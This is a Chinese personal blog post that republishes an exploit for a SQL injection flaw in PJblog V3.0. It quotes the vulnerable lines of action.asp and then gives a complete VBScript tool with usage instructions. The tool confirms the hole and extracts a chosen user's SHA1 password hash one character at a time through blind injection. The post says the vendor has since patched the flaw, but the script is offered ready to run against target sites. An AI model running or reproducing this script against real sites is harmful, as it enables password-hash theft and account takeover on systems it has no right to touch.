夜火博客 个人的碎碎念收集箱

PJblog V3.0 0day Vbs版漏洞利用工具exploit

PJblog V3.0 0day Vbs版漏洞利用工具exploit,本来还算个0day,不过PJblog官方反应速度不错,已经补了

action.asp
第14行

strcname=request("cname")
set checkcdb=conn.execute("select * from blog_Content where log_cname="""&strcname&"""")

漏洞具体细节请看http://0kee.com/read.php?tid-908.htmlPJblog V3.0 0day Vbs版漏洞利用工具exploit

If WScript.Arguments.Count <> 2 Then
        WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名"
        WScript.Echo "Example: Cscript.exe Exp.vbs
http://www.pjhome.net puterjam"
        WScript.Quit
End If
attackUrl = WScript.Arguments(0)
attackUser = WScript.Arguments(1)
attackUrl = Replace(attackUrl,"","/")
If Right(attackUrl , 1) <> "/" Then
        attackUrl = attackUrl & "/"
End If
SHA1Charset = "0123456789ABCDEFJ"
strHoleUrl = attackUrl & "action.asp?action=checkAlias&cname=0kee"""
If IsSuccess(strHoleUrl & "or ""1""=""1") And Not IsSuccess(strHoleUrl & "and ""1""=""2") Then
        WScript.Echo "恭喜!存在漏洞"
Else
        WScript.Echo "没有检测到漏洞"
        WScript.Quit
End If
For n=1 To 40
        For i=1 To 17
                strInject = strHoleUrl & " Or 0<(Select Count(*) From blog_member Where mem_name='" & attackUser & "' And mem_password>='" & strResult & Mid(SHA1Charset, i, 1) & "') And ""1""=""1"
                If Not IsSuccess(strInject) Then
                        strResult = strResult & Mid(SHA1Charset, i-1, 1)
                        Exit For
                End If
                strPrint = chr(13) & "Password(SHA1): " & strResult & Mid(SHA1Charset, i, 1)
                WScript.StdOut.Write strPrint
        Next
Next
WScript.Echo Chr(13) & Chr (10) & "Done!"
Function PostData(PostUrl)
 Dim Http
 Set Http = CreateObject("msxml2.serverXMLHTTP")
 With Http
  .Open "GET",PostUrl,False
  .Send ()
  PostData = .ResponseBody
 End With
 Set Http = Nothing
 PostData =bytes2BSTR(PostData)
End Function
Function bytes2BSTR(vIn)
 Dim strReturn
 Dim I, ThisCharCode, NextCharCode
 strReturn = ""
 For I = 1 To LenB(vIn)
  ThisCharCode = AscB(MidB(vIn, I, 1))
  If ThisCharCode < &H80 Then
   strReturn = strReturn & Chr(ThisCharCode)
  Else
   NextCharCode = AscB(MidB(vIn, I + 1, 1))
   strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
   I = I + 1
  End If
 Next
 bytes2BSTR = strReturn
End Function
Function IsSuccess(PostUrl)
strData = PostData(PostUrl)
'Wscript.Echo strData
if InStr(strData,"check_error") >0 then
        IsSuccess = True
Else
        IsSuccess = False
End If
'Wscript.Sleep 500 '让系统休息一下
End Function

用法:Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名

来源:WEB安全手册

留言列表
发表评论
来宾的头像